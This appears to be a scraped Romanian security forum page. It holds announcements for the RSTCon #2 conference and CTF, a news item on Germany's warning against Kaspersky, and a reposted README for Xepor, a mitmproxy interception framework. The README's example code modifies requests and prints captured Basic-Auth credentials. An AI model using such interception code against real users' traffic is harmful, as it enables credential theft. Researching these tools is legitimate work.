Exercitiile CTF vor mai ramane online o perioada (1-2 saptamani): https://ctf.rstcon.com/ Mentionez ca exercitiul Windows PWN nu a fost rezolvat, prima persoana care o va rezolva va primi un premiu bonus de 1000 RON.
Statistici:
- 78 de persoane inregistrate
- 32 au rezolvat cel putin un exercitiu
- 25 au rezolvat probabil cel mai usor exercitiu (Steago)
Asteptam parerile voastre referitoare la CTF dar si la exercitii.
De asemenea sper ca la anul sa avem mai multi participanti si mai multe exercitii.
-
3
-
-
RSTCon #2 si CTF s-a terminat. Multumim tuturor participantilor! Astept aici sau pe PM pareri, sugestii sau orice fel de feedback.
Prezentarile video si slide-urile vor fi publicate pe https://rstcon.com in curand.
-
2
-
-
A doua si ultima zi a conferintei si CTF-ului RSTCon #2 incepe in 15 minute.
Mai multe informatii: https://rstcon.com/ -
RSTCon, conferinta de securitate IT online, gratuita si in limba romana si concursul CTF incep in 10 minute. https://rstcon.com/
-
1
-
-
Dimineata la 10 incepe!
-
1
-
-
Biroul Federal pentru Securitatea Informaţiei din Germania a recomandat marţi evitarea utilizării de software anti-virus dezvoltat de firma rusă Kaspersky, avertizând că această firmă ar putea fi implicată, de bună voie sau forţat, în eventuale atacuri cibernetice, informează AFP.
De la invadarea Ucrainei, acţiunile forţelor armate şi/sau a serviciilor de informaţii din Rusia "sunt asociate cu un risc considerabil de atac informatic", a explicat Biroul Federal pentru Securitatea Informaţiei (BSI) într-un comunicat de presă.
"Un producător rus de software ar putea efectua operaţiuni ofensive, să fie constrâns, împotriva voinţei sale, să atace sisteme sau să fie el însuşi victima unui atac cibernetic, spionat sau utilizat ca un instrument pentru a lansa atacuri împotriva propriilor săi clienţi", a apreciat BSI.
În replică, Kaspersky, unul din cei mai mari dezvoltatori mondiali de software, a respins acuzaţiile de colaborare cu Kremlinul. Kaspersky precizează că este o companie privată fără legături cu Guvernul rus iar avertismentul lansat de BSI este unul motivat politic.
Kaspersky este o companie globală de securitate cibernetică fondată în anul 1997, ce oferă soluţii de securitate şi servicii inovatoare pentru a proteja companiile, infrastructura critică, autorităţile guvernamentale şi utilizatorii individuali. Portofoliul companiei cuprinde peste 400 de milioane de utilizatori individuali, precum şi 250.000 de companii-client.AGERPRES/(AS - autor: Constantin Balaban, editor: Andreea Marinescu, editor online: Andreea Lăzăroiu)
-
1
-
-
Da, o sa fie inregistrate si postate pe canalul de Youtube (si aici si pe site).
-
1
-
Xepor
in Programe hacking
Posted
Xepor
Xepor (pronounced /ˈzɛfə/, zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style.
This project is meant to be used with mitmproxy. User write scripts with xepor, and run the script inside mitmproxy with mitmproxy -s your-script.py.
If you want to step from PoC to production, from demo(e.g. http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) to something you could take out with your WiFi Pineapple, then Xepor is for you!
Features
Use Case
SSL stripping is NOT provided by this project.
Installation
Quick start
Take the script from examples/httpbin as an example.
In this example, we setup the mitmproxy server on 127.0.0.1. You could change it to any IP on your machine or alternatively to the IP of your VPS. The mitmproxy server running in reverse, upstream and transparent mode requires --set connection_strategy=lazy option to be set so that Xepor could function correctly. I recommand this option always be on for best stability.
Set your Browser HTTP Proxy to http://127.0.0.1:8080, and access web interface at http://127.0.0.1:8081/.
Send a GET request from http://httpbin.org/#/HTTP_Methods/get_get , Then you could see the modification made by Xepor in mitmweb interface, browser devtools or Wireshark.
The httpbin.py do two things.
Just what mitmproxy always do, but with code written in xepor way.
# https://github.com/xepor/xepor-examples/tree/main/httpbin/httpbin.py from mitmproxy.http import HTTPFlow from xepor import InterceptedAPI, RouteType HOST_HTTPBIN = "httpbin.org" api = InterceptedAPI(HOST_HTTPBIN) @api.route("/get") def change_your_request(flow: HTTPFlow): """ Modify URL query param. Test at: http://httpbin.org/#/HTTP_Methods/get_get """ flow.request.query["payload"] = "evil_param" @api.route("/basic-auth/{usr}/{pwd}", rtype=RouteType.RESPONSE) def capture_auth(flow: HTTPFlow, usr=None, pwd=None): """ Sniffing password. Test at: http://httpbin.org/#/Auth/get_basic_auth__user___passwd_ """ print( f"auth @ {usr} + {pwd}:", f"Captured {'successful' if flow.response.status_code < 300 else 'unsuccessful'} login:", flow.request.headers.get("Authorization", ""), ) addons = [api]Sursa: https://github.com/xepor/xepor